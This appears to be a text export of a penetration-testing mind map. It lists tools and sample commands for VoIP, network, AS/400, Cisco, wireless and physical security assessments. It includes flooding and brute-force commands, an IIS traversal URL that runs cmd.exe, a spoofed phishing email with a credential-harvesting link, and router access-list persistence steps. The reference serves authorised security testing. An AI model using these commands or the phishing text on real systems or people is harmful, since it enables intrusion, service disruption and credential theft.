Penetration Testing Framework 0.58

Get Started. It's Free
or sign up with your email address
Penetration Testing Framework 0.58 by Mind Map: Penetration Testing Framework 0.58

1. VoIP Security

1.1. Sniffing Tools

1.1.1. AuthTool

1.1.2. Cain & Abel

1.1.3. Etherpeek

1.1.4. NetDude

1.1.5. Oreka

1.1.6. PSIPDump

1.1.7. SIPomatic

1.1.8. SIPv6 Analyzer

1.1.9. UCSniff

1.1.10. VoiPong

1.1.11. VOMIT

1.1.12. Wireshark

1.1.13. WIST - Web Interface for SIP Trace

1.2. Scanning and Enumeration Tools

1.2.1. enumIAX

1.2.2. fping

1.2.3. IAX Enumerator

1.2.4. iWar

1.2.5. Nessus

1.2.6. Nmap

1.2.7. SIP Forum Test Framework (SFTF)

1.2.8. SIPcrack

1.2.9. sipflanker

1.2.9.1. python sipflanker.py 192.168.1-254

1.2.10. SIP-Scan

1.2.11. SIP.Tastic

1.2.12. SIPVicious

1.2.13. SiVuS

1.2.14. SMAP

1.2.14.1. smap IP_Address/Subnet_Mask

1.2.14.2. smap -o IP_Address/Subnet_Mask

1.2.14.3. smap -l IP_Address

1.2.15. snmpwalk

1.2.16. VLANping

1.2.17. VoIPAudit

1.2.18. VoIP GHDB Entries

1.2.19. VoIP Voicemail Database

1.3. Packet Creation and Flooding Tools

1.3.1. H.323 Injection Files

1.3.2. H225regreject

1.3.3. IAXHangup

1.3.4. IAXAuthJack

1.3.5. IAX.Brute

1.3.6. IAXFlooder

1.3.6.1. ./iaxflood sourcename destinationname numpackets

1.3.7. INVITE Flooder

1.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets

1.3.8. kphone-ddos

1.3.9. RTP Flooder

1.3.10. rtpbreak

1.3.11. Scapy

1.3.12. Seagull

1.3.13. SIPBomber

1.3.14. SIPNess

1.3.15. SIPp

1.3.16. SIPsak

1.3.16.1. Tracing paths: - sipsak -T -s sip:usernaem@domain

1.3.16.2. Options request:- sipsak -vv -s sip:username@domain

1.3.16.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain

1.3.17. SIP-Send-Fun

1.3.18. SIPVicious

1.3.19. Spitter

1.3.20. TFTP Brute Force

1.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>

1.3.21. UDP Flooder

1.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

1.3.22. UDP Flooder (with VLAN Support)

1.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets

1.3.23. Voiphopper

1.4. Fuzzing Tools

1.4.1. Asteroid

1.4.2. Codenomicon VoIP Fuzzers

1.4.3. Fuzzy Packet

1.4.4. Mu Security VoIP Fuzzing Platform

1.4.5. ohrwurm RTP Fuzzer

1.4.6. PROTOS H.323 Fuzzer

1.4.7. PROTOS SIP Fuzzer

1.4.8. SIP Forum Test Framework (SFTF)

1.4.9. Sip-Proxy

1.4.10. Spirent ThreatEx

1.5. Signaling Manipulation Tools

1.5.1. AuthTool

1.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v

1.5.2. BYE Teardown

1.5.3. Check Sync Phone Rebooter

1.5.4. RedirectPoison

1.5.4.1. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"

1.5.5. Registration Adder

1.5.6. Registration Eraser

1.5.7. Registration Hijacker

1.5.8. SIP-Kill

1.5.9. SIP-Proxy-Kill

1.5.10. SIP-RedirectRTP

1.5.11. SipRogue

1.5.12. vnak

1.6. Media Manipulation Tools

1.6.1. RTP InsertSound

1.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

1.6.2. RTP MixSound

1.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

1.6.3. RTPProxy

1.6.4. RTPInject

1.7. Generic Software Suites

1.7.1. OAT Office Communication Server Tool Assessment

1.7.2. EnableSecurity VOIPPACK

1.7.2.1. Note: - Add-on for Immunity Canvas

1.8. References

1.8.1. URL's

1.8.1.1. Common Vulnerabilities and Exploits (CVE)

1.8.1.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip

1.8.1.2. Default Passwords

1.8.1.3. Hacking Exposed VoIP

1.8.1.3.1. Tool Pre-requisites

1.8.1.4. VoIPsa

1.8.2. White Papers

1.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems

1.8.2.2. An Analysis of VoIP Security Threats and Tools

1.8.2.3. Hacking VoIP Exposed

1.8.2.4. Security testing of SIP implementations

1.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks

1.8.2.6. Two attacks against VoIP

1.8.2.7. VoIP Attacks!

1.8.2.8. VoIP Security Audit Program (VSAP)

2. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS's respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.

2.1. Default Port Lists

2.1.1. Windows

2.1.2. *nix

2.2. Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific

2.2.1. General Enumeration Tools

2.2.1.1. nmap

2.2.1.1.1. nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml

2.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results

2.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results

2.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason

2.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list

2.2.1.2. netcat

2.2.1.2.1. nc -v -n IP_Address port

2.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number

2.2.1.3. amap

2.2.1.3.1. amap -bqv 192.168.1.1 80

2.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]

2.2.1.4. xprobe2

2.2.1.4.1. xprobe2 192.168.1.1

2.2.1.5. sinfp

2.2.1.5.1. ./sinfp.pl -i -p

2.2.1.6. nbtscan

2.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)

2.2.1.7. hping

2.2.1.7.1. hping ip_address

2.2.1.8. scanrand

2.2.1.8.1. scanrand ip_address:all

2.2.1.9. unicornscan

2.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E

2.2.1.10. netenum

2.2.1.10.1. netenum network/netmask timeout

2.2.1.11. fping

2.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)

2.2.2. Firewall Specific Tools

2.2.2.1. firewalk

2.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]

2.2.2.2. ftester

2.2.2.2.1. host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log

2.2.3. Default Passwords (Examine list)

2.2.3.1. Passwords A

2.2.3.2. Passwords B

2.2.3.3. Passwords C

2.2.3.4. Passwords D

2.2.3.5. Passwords E

2.2.3.6. Passwords F

2.2.3.7. Passwords G

2.2.3.8. Passwords H

2.2.3.9. Passwords I

2.2.3.10. Passwords J

2.2.3.11. Passwords K

2.2.3.12. Passwords L

2.2.3.13. Passwords M

2.2.3.14. Passwords N

2.2.3.15. Passwords O

2.2.3.16. Passwords P

2.2.3.17. Passwords R

2.2.3.18. Passwords S

2.2.3.19. Passwords T

2.2.3.20. Passwords U

2.2.3.21. Passwords V

2.2.3.22. Passwords W

2.2.3.23. Passwords X

2.2.3.24. Passwords Y

2.2.3.25. Passwords Z

2.2.3.26. Passwords (Numeric)

2.3. Active Hosts

2.3.1. Open TCP Ports

2.3.2. Closed TCP Ports

2.3.3. Open UDP Ports

2.3.4. Closed UDP Ports

2.3.5. Service Probing

2.3.5.1. SMTP Mail Bouncing

2.3.5.2. Banner Grabbing

2.3.5.2.1. Other

2.3.5.2.2. HTTP

2.3.5.2.3. HTTPS

2.3.5.2.4. SMTP

2.3.5.2.5. POP3

2.3.5.2.6. FTP

2.3.6. ICMP Responses

2.3.6.1. Type 3 (Port Unreachable)

2.3.6.2. Type 8 (Echo Request)

2.3.6.3. Type 13 (Timestamp Request)

2.3.6.4. Type 15 (Information Request)

2.3.6.5. Type 17 (Subnet Address Mask Request)

2.3.6.6. Responses from broadcast address

2.3.7. Source Port Scans

2.3.7.1. TCP/UDP 53 (DNS)

2.3.7.2. TCP 20 (FTP Data)

2.3.7.3. TCP 80 (HTTP)

2.3.7.4. TCP/UDP 88 (Kerberos)

2.3.8. Firewall Assessment

2.3.8.1. Firewalk

2.3.8.2. TCP/UDP/ICMP responses

2.3.9. OS Fingerprint

3. AS/400 Auditing

3.1. Remote

3.1.1. Information Gathering

3.1.1.1. Nmap using common iSeries (AS/400) services.

3.1.1.1.1. Unsecured services (Port;name;description)

3.1.1.1.2. Secured services (Port;name;description)

3.1.1.2. NetCat (old school technique)

3.1.1.2.1. nc -v -z -w target ListOfServices.txt | grep "open"

3.1.1.3. Banners Grabbing

3.1.1.3.1. Telnet

3.1.1.3.2. FTP

3.1.1.3.3. HTTP Banner

3.1.1.3.4. POP3

3.1.1.3.5. SNMP

3.1.1.3.6. SMTP

3.1.2. Users Enumeration

3.1.2.1. Default AS/400 users accounts

3.1.2.2. Error messages

3.1.2.2.1. Telnet Login errors

3.1.2.2.2. POP3 authentication Errors

3.1.2.3. Qsys symbolic link (if ftp is enabled)

3.1.2.3.1. ftp target | quote stat | quote site namefmt 1

3.1.2.3.2. cd /

3.1.2.3.3. quote site listfmt 1

3.1.2.3.4. mkdir temp

3.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')

3.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')

3.1.2.3.7. dir /temp/qsys/*.usrprf

3.1.2.4. LDAP

3.1.2.4.1. Need os400-sys value from ibm-slapdSuffix

3.1.2.4.2. Tool to browse LDAP

3.1.3. Exploitation

3.1.3.1. CVE References

3.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400

3.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0

3.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3

3.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3

3.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0

3.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0

3.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3

3.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0

3.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3

3.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3

3.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3

3.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0

3.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3

3.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3

3.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3

3.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3

3.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3

3.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3

3.1.3.2. Access with Work Station Gateway

3.1.3.2.1. http://target:5061/WSG

3.1.3.2.2. Default AS/400 accounts.

3.1.3.3. Network attacks (next release)

3.1.3.3.1. DB2

3.1.3.3.2. QSHELL

3.1.3.3.3. Hijacking Terminals

3.1.3.3.4. Trojan attacks

3.1.3.3.5. Hacking from AS/400

3.2. Local

3.2.1. System Value Security

3.2.1.1. Untitled

3.2.1.1.1. Untitled

3.2.1.2. Untitled

3.2.1.2.1. Untitled

3.2.1.3. Untitled

3.2.1.3.1. Untitled

3.2.1.4. Untitled

3.2.1.4.1. Recommended value is 30

3.2.2. Password Policy

3.2.2.1. Untitled

3.2.2.1.1. Untitled

3.2.2.2. Untitled

3.2.2.2.1. Untitled

3.2.2.3. Untitled

3.2.2.3.1. Untitled

3.2.2.4. Untitled

3.2.2.4.1. Untitled

3.2.2.5. Untitled

3.2.3. Audit level

3.2.3.1. Untitled

3.2.3.1.1. Recommended value is *SECURITY

3.2.4. Documentation

3.2.4.1. Users class

3.2.4.1.1. Untitled

3.2.4.2. System Audit Settings

3.2.4.2.1. Untitled

3.2.4.3. Special Authorities Definitions

3.2.4.3.1. Untitled

4. Server Specific Tests

4.1. Databases

4.1.1. Direct Access Interrogation

4.1.1.1. MS SQL Server

4.1.1.1.1. Ports

4.1.1.1.2. Version

4.1.1.1.3. osql

4.1.1.2. Oracle

4.1.1.2.1. Ports

4.1.1.2.2. TNS Listener

4.1.1.2.3. SQL Plus

4.1.1.2.4. Default Account/Passwords

4.1.1.2.5. Default SID's

4.1.1.3. MySQL

4.1.1.3.1. Ports

4.1.1.3.2. Version

4.1.1.3.3. Users/Passwords

4.1.1.4. DB2

4.1.1.5. Informix

4.1.1.6. Sybase

4.1.1.7. Other

4.1.2. Scans

4.1.2.1. Default Ports

4.1.2.2. Non-Default Ports

4.1.2.3. Instance Names

4.1.2.4. Versions

4.1.3. Password Attacks

4.1.3.1. Sniffed Passwords

4.1.3.1.1. Cracked Passwords

4.1.3.1.2. Hashes

4.1.3.2. Direct Access Guesses

4.1.4. Vulnerability Assessment

4.1.4.1. Automated

4.1.4.1.1. Reports

4.1.4.1.2. Vulnerabilities

4.1.4.2. Manual

4.1.4.2.1. Patch Levels

4.1.4.2.2. Confirmed Vulnerabilities

4.2. Mail

4.2.1. Scans

4.2.2. Fingerprint

4.2.2.1. Manual

4.2.2.2. Automated

4.2.3. Spoofable

4.2.3.1. Telnet spoof

4.2.3.1.1. telnet target_IP 25helo target.commail from: [email protected] to: [email protected]: [email protected]: [192.168.1.1]X-Originating-Email: [[email protected]]MIME-Version: 1.0To: <[email protected]>From: < [email protected] >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>Online Security Manager.Target [email protected].

4.2.4. Relays

4.3. VPN

4.3.1. Scanning

4.3.1.1. 500 UDP IPSEC

4.3.1.2. 1723 TCP PPTP

4.3.1.3. 443 TCP/SSL

4.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27

4.3.1.5. ipsecscan 80.75.68.22 80.75.68.27

4.3.2. Fingerprinting

4.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27

4.3.3. PSK Crack

4.3.3.1. ikeprobe 80.75.68.27

4.3.3.2. sniff for responses with C&A or ikecrack

4.4. Web

4.4.1. Vulnerability Assessment

4.4.1.1. Automated

4.4.1.1.1. Reports

4.4.1.1.2. Vulnerabilities

4.4.1.2. Manual

4.4.1.2.1. Patch Levels

4.4.1.2.2. Confirmed Vulnerabilities

4.4.2. Permissions

4.4.2.1. PUT /test.txt HTTP/1.0

4.4.2.2. CONNECT mail.another.com:25 HTTP/1.0

4.4.2.3. POST http://mail.another.com:25/ HTTP/1.0Content-Type: text/plainContent-Length: 6

4.4.3. Scans

4.4.4. Fingerprinting

4.4.4.1. Other

4.4.4.2. HTTP

4.4.4.2.1. Commands

4.4.4.2.2. Modules

4.4.4.2.3. File Extensions

4.4.4.3. HTTPS

4.4.4.3.1. Commands

4.4.4.3.2. Commands

4.4.4.3.3. File Extensions

4.4.5. Directory Traversal

4.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

5. Bluetooth Specific Testing

5.1. Bluescanner

5.2. Bluesweep

5.3. btscanner

5.4. Redfang

5.5. Blueprint

5.6. Bluesnarfer

5.7. Bluebugger

5.7.1. bluebugger [OPTIONS] -a <addr> [MODE]

5.8. Blueserial

5.9. Bloover

5.10. Bluesniff

5.11. Exploit Frameworks

5.11.1. BlueMaho

5.11.1.1. Untitled

5.12. Resources

5.12.1. URL's

5.12.1.1. BlueStumbler.org

5.12.1.2. Bluejackq.com

5.12.1.3. Bluejacking.com

5.12.1.4. Bluejackers

5.12.1.5. bluetooth-pentest

5.12.1.6. ibluejackedyou.com

5.12.1.7. Trifinite

5.12.2. Vulnerability Information

5.12.2.1. Common Vulnerabilities and Exploits (CVE)

5.12.2.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth

5.12.3. White Papers

5.12.3.1. Bluesnarfing

6. Cisco Specific Testing

6.1. Methodology

6.1.1. Scan & Fingerprint.

6.1.1.1. Untitled

6.1.1.2. Untitled

6.1.1.3. If SNMP is active, then community string guessing should be performed.

6.1.2. Credentials Guessing.

6.1.2.1. Untitled

6.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!

6.1.3. Connect

6.1.3.1. Untitled

6.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.

6.1.4. Check for bugs

6.1.4.1. Untitled

6.1.4.1.1. The most widely knwon/ used are: Nessus, Retina, GFI LanGuard and Core Impact. 

6.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln

6.1.5. Further your attack

6.1.5.1. Untitled

6.1.5.1.1. running-config is the currently running configuration settings.  This gets loaded from the startup-config on boot.  This configuration file is editable and the changes are immediate.  Any changes will be lost once the router is rebooted.  It is this file that requires altering to maintain a non-permenant connection through to the internal network.  

6.1.5.1.2. startup-config is the boot up configuration file.  It is this file that needs altering to maintain a permenant  connection through to the internal network.  

6.1.5.2. Untitled

6.1.5.2.1. #> access-list 100 permit ip <IP> any

6.2. Scan & Fingerprint.

6.2.1. Port Scanning

6.2.1.1. nmap

6.2.1.1.1. Untitled

6.2.1.2. Other tools

6.2.1.2.1. Untitled

6.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.

6.2.2. Fingerprinting

6.2.2.1. Untitled

6.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175

6.2.2.2. Untitled

6.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt

6.2.2.2.2. Untitled

6.3. Password Guessing.

6.3.1. Untitled

6.3.1.1. ./CAT  -h  <IP>  -a  password.wordlist

6.3.1.2. Untitled

6.3.2. Untitled

6.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]

6.3.2.2. Untitled

6.3.3. Untitled

6.3.3.1. BT tmp # hydra  -l  ""  -P  password.wordlist  -t  4  <IP>  cisco

6.3.3.2. Untitled

6.4. SNMP Attacks.

6.4.1. Untitled

6.4.1.1. ./CAT  -h  <IP>  -w  SNMP.wordlist

6.4.1.2. Untitled

6.4.2. Untitled

6.4.2.1. onesixytone  -c  SNMP.wordlist  <IP>

6.4.2.2. BT onesixtyone-0.3.2 # onesixtyone  -c  dict.txt  10.1.1.175 Scanning 1 hosts, 64 communities 10.1.1.175 [enable] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug 10.1.1.175 [Cisco] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug

6.4.3. Untitled

6.4.3.1. snmapwalk  -v  <Version>  -c  <Community string>  <IP>

6.4.3.2. Untitled

6.5. Connecting.

6.5.1. Telnet

6.5.1.1. Untitled

6.5.1.1.1.  telnet  <IP>

6.5.1.1.2. Sample Banners

6.5.2. SSH

6.5.3. Web Browser

6.5.3.1. Untitled

6.5.3.1.1. This uses a combination of username and password to authenticate.  After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:

6.5.3.1.2. Authentication Required Enter username and password for "level_15_access" at http://10.1.1.1 User Name: Password:

6.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.

6.5.4. TFTP

6.5.4.1. Untitled

6.5.4.1.1. Untitled

6.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server.  Both of these tools require the config files to be saved with default names.

6.5.4.2. Untitled

6.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>

6.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>

6.5.4.2.3. Creating backdoors in Cisco IOS using TCL

6.6. Known Bugs.

6.6.1. Attack Tools

6.6.1.1. Untitled

6.6.1.1.1. Untitled

6.6.1.2. Untitled

6.6.1.2.1. Web browse to the Cisco device: http://<IP>

6.6.1.2.2. Untitled

6.6.1.2.3. Untitled

6.6.1.2.4. Untitled

6.6.1.3. Untitled

6.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt

6.6.2. Common Vulnerabilities and Exploits (CVE) Information

6.6.2.1. Vulnerabilties and exploit information relating to these products can be found here:http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS

6.7. Configuration Files.

6.7.1. Untitled

6.7.1.1. Configuration files explained

6.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password which is superceeded by the enable secret password for remote access.

6.7.1.1.2. Untitled

6.7.1.1.3. Untitled

6.7.1.1.4. Password Encryption Utilised

6.7.1.1.5. Untitled

6.7.1.2. Configuration Testing Tools

6.7.1.2.1. Nipper

6.7.1.2.2. fwauto (Beta)

6.8. References.

6.8.1. Cisco IOS Exploitation Techniques

7. Wireless Penetration

7.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.

7.1.1. Site Map

7.1.1.1. RF Map

7.1.1.1.1. Lines of Sight

7.1.1.1.2. Signal Coverage

7.1.1.2. Physical Map

7.1.1.2.1. Triangulate APs

7.1.1.2.2. Satellite Imagery

7.1.2. Network Map

7.1.2.1. MAC Filter

7.1.2.1.1. Authorised MAC Addresses

7.1.2.1.2. Reaction to Spoofed MAC Addresses

7.1.2.2. Encryption Keys utilised

7.1.2.2.1. WEP

7.1.2.2.2. WPA/PSK

7.1.2.2.3. 802.1x

7.1.2.3. Access Points

7.1.2.3.1. ESSID

7.1.2.3.2. BSSIDs

7.1.2.4. Wireless Clients

7.1.2.4.1. MAC Addresses

7.1.2.4.2. Intercepted Traffic

7.2. Wireless Toolkit

7.2.1. Wireless Discovery

7.2.1.1. Aerosol

7.2.1.2. Airfart

7.2.1.3. Aphopper

7.2.1.4. Apradar

7.2.1.5. BAFFLE

7.2.1.6. inSSIDer

7.2.1.7. iWEPPro

7.2.1.8. karma

7.2.1.9. KisMAC-ng

7.2.1.10. Kismet

7.2.1.11. MiniStumbler

7.2.1.12. Netstumbler

7.2.1.13. Vistumbler

7.2.1.14. Wellenreiter

7.2.1.15. Wifi Hopper

7.2.1.16. WirelessMon

7.2.1.17. WiFiFoFum

7.2.2. Packet Capture

7.2.2.1. Airopeek

7.2.2.2. Airpcap

7.2.2.3. Airtraf

7.2.2.4. Apsniff

7.2.2.5. Cain

7.2.2.6. Commview

7.2.2.7. Ettercap

7.2.2.8. Netmon

7.2.2.8.1. nmwifi

7.2.2.9. Wireshark

7.2.3. EAP Attack tools

7.2.3.1. eapmd5pass

7.2.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump

7.2.3.1.2. Untitled

7.2.4. Leap Attack Tools

7.2.4.1. asleap

7.2.4.2. thc leap cracker

7.2.4.3. anwrap

7.2.5. WEP/ WPA Password Attack Tools

7.2.5.1. Airbase

7.2.5.2. Aircrack-ptw

7.2.5.3. Aircrack-ng

7.2.5.4. Airsnort

7.2.5.5. cowpatty

7.2.5.6. FiOS Wireless Key Calculator

7.2.5.7. iWifiHack

7.2.5.8. KisMAC-ng

7.2.5.9. Rainbow Tables

7.2.5.10. wep attack

7.2.5.11. wep crack

7.2.5.12. wzcook

7.2.6. Frame Generation Software

7.2.6.1. Airgobbler

7.2.6.2. airpwn

7.2.6.3. Airsnarf

7.2.6.4. Commview

7.2.6.5. fake ap

7.2.6.6. void 11

7.2.6.7. wifi tap

7.2.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]

7.2.6.8. FreeRADIUS - Wireless Pwnage Edition

7.2.7. Mapping Software

7.2.7.1. Online Mapping

7.2.7.1.1. WIGLE

7.2.7.1.2. Skyhook

7.2.7.2. Tools

7.2.7.2.1. Knsgem

7.2.8. File Format Conversion Tools

7.2.8.1. ns1 recovery and conversion tool

7.2.8.2. warbable

7.2.8.3. warkizniz

7.2.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]

7.2.8.4. ivstools

7.2.9. IDS Tools

7.2.9.1. WIDZ

7.2.9.2. War Scanner

7.2.9.3. Snort-Wireless

7.2.9.4. AirDefense

7.2.9.5. AirMagnet

7.3. WLAN discovery

7.3.1. Unencrypted WLAN

7.3.1.1. Visible SSID

7.3.1.1.1. Sniff for IP range

7.3.1.2. Hidden SSID

7.3.1.2.1. Deauth client

7.3.2. WEP encrypted WLAN

7.3.2.1. Visible SSID

7.3.2.1.1. WEPattack

7.3.2.2. Hidden SSID

7.3.2.2.1. Deauth client

7.3.3. WPA / WPA2 encrypted WLAN

7.3.3.1. Deauth client

7.3.3.1.1. Capture EAPOL handshake

7.3.4. LEAP encrypted WLAN

7.3.4.1. Deauth client

7.3.4.1.1. Break LEAP

7.3.5. 802.1x WLAN

7.3.5.1. Create Rogue Access Point

7.3.5.1.1. Airsnarf

7.3.5.1.2. fake ap

7.3.5.1.3. Hotspotter

7.3.5.1.4. Karma

7.3.5.1.5. Linux rogue AP

7.3.6. Resources

7.3.6.1. URL's

7.3.6.1.1. Wirelessdefence.org

7.3.6.1.2. Russix

7.3.6.1.3. Wardrive.net

7.3.6.1.4. Wireless Vulnerabilities and Exploits (WVE)

7.3.6.2. White Papers

7.3.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4

7.3.6.2.2. 802.11b Firmware-Level Attacks

7.3.6.2.3. Wireless Attacks from an Intrusion Detection Perspective

7.3.6.2.4. Implementing a Secure Wireless Network for a Windows Environment

7.3.6.2.5. Breaking 104 bit WEP in less than 60 seconds

7.3.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz

7.3.6.2.7. Active behavioral fingerprinting of wireless devices

7.3.6.3. Common Vulnerabilities and Exploits (CVE)

7.3.6.3.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless

8. Physical Security

8.1. Building Security

8.1.1. Meeting Rooms

8.1.1.1. Check for active network jacks.

8.1.1.2. Check for any information in room.

8.1.2. Lobby

8.1.2.1. Check for active network jacks.

8.1.2.2. Does receptionist/guard leave lobby?

8.1.2.3. Accessbile printers? Print test page.

8.1.2.4. Obtain phone/personnel listing.

8.1.3. Communal Areas

8.1.3.1. Check for active network jacks.

8.1.3.2. Check for any information in room.

8.1.3.3. Listen for employee conversations.

8.1.4. Room Security

8.1.4.1. Resistance of lock to picking.

8.1.4.1.1. What type of locks are used in building? Pin tumblers, padlocks, abinet locks, dimple keys, proximity sensors?

8.1.4.2. Ceiling access areas.

8.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?

8.1.5. Windows

8.1.5.1. Check windows/doors for visible intruderalarm sensors.

8.1.5.2. Check visible areas for sensitive information.

8.1.5.3. Can you video users logging on?

8.2. Perimeter Security

8.2.1. Fence Security

8.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.

8.2.2. Exterior Doors

8.2.2.1. If there is no perimeter fence, then determineif exterior doors are secured, guarded andmonitored etc.

8.2.3. Guards

8.2.3.1. Patrol Routines

8.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.

8.2.3.2. Communications

8.2.3.2.1. Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physial intrusion.

8.3. Entry Points

